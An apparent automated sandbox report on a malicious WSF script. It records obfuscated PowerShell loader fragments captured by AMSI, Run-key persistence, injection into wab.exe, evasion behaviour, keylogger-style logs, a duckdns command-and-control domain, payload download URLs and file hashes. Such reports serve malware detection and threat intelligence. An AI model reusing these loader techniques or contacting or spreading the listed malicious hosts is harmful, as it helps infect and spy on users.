Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Deckets $Cads173 $Ansatses), (Romanbladsstilen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:ungrowing = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lossepladsernes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Computerforhandlerens, $false).DefineType
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348900BD pushad ; iretd	2_2_00007FFD348900C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B0A25 push esi; retf	5_2_046B0A2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B0A19 push esi; retf	5_2_046B0A1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B11B5 pushad ; retf	5_2_046B1199
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B118B pushad ; retf	5_2_046B1199
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B119B pushfd ; retf	5_2_046B11A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B33F5 push esp; retf	5_2_046B33D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046B33C5 push esp; retf	5_2_046B33D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_049008C2 push eax; mov dword ptr [esp], ecx	5_2_04900AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08DF4DCF push cs; retf	5_2_08DF4DD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08DF05C7 push cs; ret	5_2_08DF05E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08DF1193 push ecx; iretd	5_2_08DF1195
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_046605C7 push cs; ret	10_2_046605E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04664DCF push cs; retf	10_2_04664DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04661193 push ecx; iretd	10_2_04661195

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4668	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5224	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7902	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1843	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3489	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5461	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: foregroundWindowGot 1759	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1112	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892	Thread sleep count: 7902 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892	Thread sleep count: 1843 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4828	Thread sleep count: 3489 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632	Thread sleep count: 100 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632	Thread sleep count: 5461 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632	Thread sleep time: -16383000s >= -30000s	Jump to behavior

Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2661868047.0000023D7285E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWCh%SystemRoot%\system32\mswsock.dllhelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: E5FE74			Jump to behavior

Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrs
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerD
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerEM
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managernet/s
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager_sE
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager}s'
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerLs6
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager sB
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managernet/
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/04/20 16:05:48 Program Manager]
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerds
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerc300cfO
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerxs
Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr	Binary or memory string: [2024/04/20 16:05:42 Program Manager]
Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerKs)

Windows Analysis Report rOferta_SKGNMECLemnedefinitionen353523577.wsf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
rOferta_SKGNMECLemnedefinitionen353523577.wsf

Malware Threat Intel
Provided by

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
87.121.105.163	unknown	Bulgaria	43561	NET1-ASBG	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
45.88.90.110	jgbours284hawara01.duckdns.org	Bulgaria	10753	LVLT-10753US	true

Name	Malicious	Antivirus Detection	Reputation
jgbours284hawara01.duckdns.org	true	7%, Virustotal, Browse	unknown
http://87.121.105.163/Belyves242.hhk	false	15%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin	false		unknown

ID:	1429076
Product:	CloudBasic
Start time:	16:04:10
Start date:	20.04.2024
Sample:	rOferta_SKGNMECLemnedefinitionen353523577.wsf
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ed7122bfc1517425a483908cff86d950
SHA1:	d71986894ac69f6958f3e126bec9eaabea50fa5c
SHA256:	813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
Filetype:	Generic XML (ASCII) (5005/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json	JSON data	334018F02CE31BCBB4864D602B557FE5	C6DE43E8D6B5C026C0B0A56A898A3F00B282B881	F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55dvwptc.llq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4xp1nt5.3em.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uito114p.1i1.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Sneglefart.Glo	ASCII text, with very long lines (65536), with no line terminators	AA8E1FF80B164E8028DFA9321E7A95A2	F9B328C860083A3784219725EBD5690F5BA19027	AF2499C512C0A15453EB4E7FFE57AAE14170E7A88CEE0524A555BF65094B8018
C:\Users\user\AppData\Roaming\mvourhjs.dat	data	7D56EFE1C932D82F837D3AE2E5E94BA8	B846E1EBC341B33865C49EA9131A44E9FCC8AF95	305DE02AE57C93DC8DD3F6A2A313B1438F005BA6BD8A830D6103C96D79FF931F